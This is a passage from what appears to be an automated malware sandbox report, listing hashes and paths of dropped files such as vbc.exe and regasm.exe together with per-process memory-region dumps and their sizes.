SHA1ed5c87e500c51e055ddb9160929a3dac51d3a393
SHA256744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f
SHA51266f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msMD5
98452948bf0ef2e253e6a7fb03276fd5
SHA189aa6864d4bb558f036b24c74d870517701ec3f3
SHA256151135496a0c66040eeb12bc2c5489c87221094ab17da5a981c574686a524c7d
SHA512661eda145d7d0f1a3fa44cc4ea9a09d8eba39f1e3a3cc42cb60ead043b2ac60077070b95db36ce599966d1f6a9906294d5330abad6b9c0e9520c2459e68fe26f
-
C:\Users\Public\regasm.exeMD5
7f06feab552ff5b4b5ea9c0c08a50982
SHA1fec42fd952353328a01939c949ccb7031be50530
SHA256053e45fb6090b18e9a8ff0a8c24fd2d77eca4057539b1add95e03c38be35b3a0
SHA5129c5877c7851e8d6b000c729948b330ab66e69a18205b3ac5de70b4907360f3fb4541e6745312f7deb08f1a046fb2470e13ab9ca326e0e2f478819ecaa47e9be0
-
\Users\Admin\AppData\Local\Temp\vbc.exeMD5
3dac10541270990e15c8742b0cd6f153
SHA1ed5c87e500c51e055ddb9160929a3dac51d3a393
SHA256744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f
SHA51266f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1
-
\Users\Admin\AppData\Local\Temp\vbc.exeMD5
3dac10541270990e15c8742b0cd6f153
SHA1ed5c87e500c51e055ddb9160929a3dac51d3a393
SHA256744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f
SHA51266f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1
-
\Users\Public\regasm.exeMD5
7f06feab552ff5b4b5ea9c0c08a50982
SHA1fec42fd952353328a01939c949ccb7031be50530
SHA256053e45fb6090b18e9a8ff0a8c24fd2d77eca4057539b1add95e03c38be35b3a0
SHA5129c5877c7851e8d6b000c729948b330ab66e69a18205b3ac5de70b4907360f3fb4541e6745312f7deb08f1a046fb2470e13ab9ca326e0e2f478819ecaa47e9be0
-
\Users\Public\regasm.exeMD5
7f06feab552ff5b4b5ea9c0c08a50982
SHA1fec42fd952353328a01939c949ccb7031be50530
SHA256053e45fb6090b18e9a8ff0a8c24fd2d77eca4057539b1add95e03c38be35b3a0
SHA5129c5877c7851e8d6b000c729948b330ab66e69a18205b3ac5de70b4907360f3fb4541e6745312f7deb08f1a046fb2470e13ab9ca326e0e2f478819ecaa47e9be0
-
memory/376-65-0x0000000000000000-mapping.dmp
-
memory/1032-98-0x00000000000C0000-0x00000000000EF000-memory.dmpFilesize
188KB
-
memory/1032-97-0x00000000009F0000-0x00000000009F9000-memory.dmpFilesize
36KB
-
memory/1032-101-0x0000000001F50000-0x0000000001FE4000-memory.dmpFilesize
592KB
-
memory/1032-100-0x0000000002220000-0x0000000002523000-memory.dmpFilesize
3.0MB
-
memory/1032-96-0x0000000000000000-mapping.dmp
-
memory/1104-54-0x0000000072A31000-0x0000000072A34000-memory.dmpFilesize
12KB
-
memory/1104-102-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1104-57-0x0000000075821000-0x0000000075823000-memory.dmpFilesize
8KB
-
memory/1104-56-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1104-55-0x00000000704B1000-0x00000000704B3000-memory.dmpFilesize
8KB
-
memory/1120-99-0x0000000000000000-mapping.dmp
-
memory/1180-64-0x000007FEFBE61000-0x000007FEFBE63000-memory.dmpFilesize
8KB
-
memory/1180-63-0x0000000000000000-mapping.dmp
-
memory/1264-93-0x0000000006E20000-0x0000000006FC8000-memory.dmpFilesize
1.7MB
-
memory/1264-95-0x0000000007540000-0x00000000076D9000-memory.dmpFilesize
1.6MB
-
memory/1264-103-0x00000000080B0000-0x0000000008230000-memory.dmpFilesize
1.5MB
-
memory/1472-85-0x00000000048E0000-0x0000000004941000-memory.dmpFilesize
388KB
-
memory/1472-84-0x0000000004E30000-0x0000000004E31000-memory.dmpFilesize
4KB
-
memory/1472-86-0x0000000001350000-0x0000000001382000-memory.dmpFilesize
200KB
-
memory/1472-83-0x0000000000C80000-0x0000000000C9D000-memory.dmpFilesize
116KB
-
memory/1472-81-0x0000000001390000-0x0000000001391000-memory.dmpFilesize
4KB
-
memory/1472-79-0x0000000000000000-mapping.dmp
-
memory/1592-76-0x0000000002222000-0x0000000002224000-memory.dmpFilesize
8KB
-
memory/1592-75-0x0000000002221000-0x0000000002222000-memory.dmpFilesize
4KB
-
memory/1592-74-0x0000000002220000-0x0000000002221000-memory.dmpFilesize
4KB
-
memory/1592-73-0x0000000004BA0000-0x00000000050D6000-memory.dmpFilesize
5.2MB
-
memory/1592-70-0x0000000000000000-mapping.dmp
-
memory/1732-92-0x00000000002B0000-0x00000000002C5000-memory.dmpFilesize
84KB
-
memory/1732-94-0x00000000002F0000-0x0000000000305000-memory.dmpFilesize
84KB
-
memory/1732-91-0x0000000000930000-0x0000000000C33000-memory.dmpFilesize
3.0MB
-
memory/1732-89-0x000000000041F1B0-mapping.dmp
-
memory/1732-88-0x0000000000400000-0x000000000042F000-memory.dmpFilesize
188KB
-
memory/1748-69-0x0000000004AF0000-0x0000000005026000-memory.dmpFilesize
5.2MB
-
memory/1748-68-0x0000000002590000-0x00000000031DA000-memory.dmpFilesize
12.3MB
-
memory/1748-66-0x0000000000000000-mapping.dmp
-
memory/1812-61-0x0000000000000000-mapping.dmp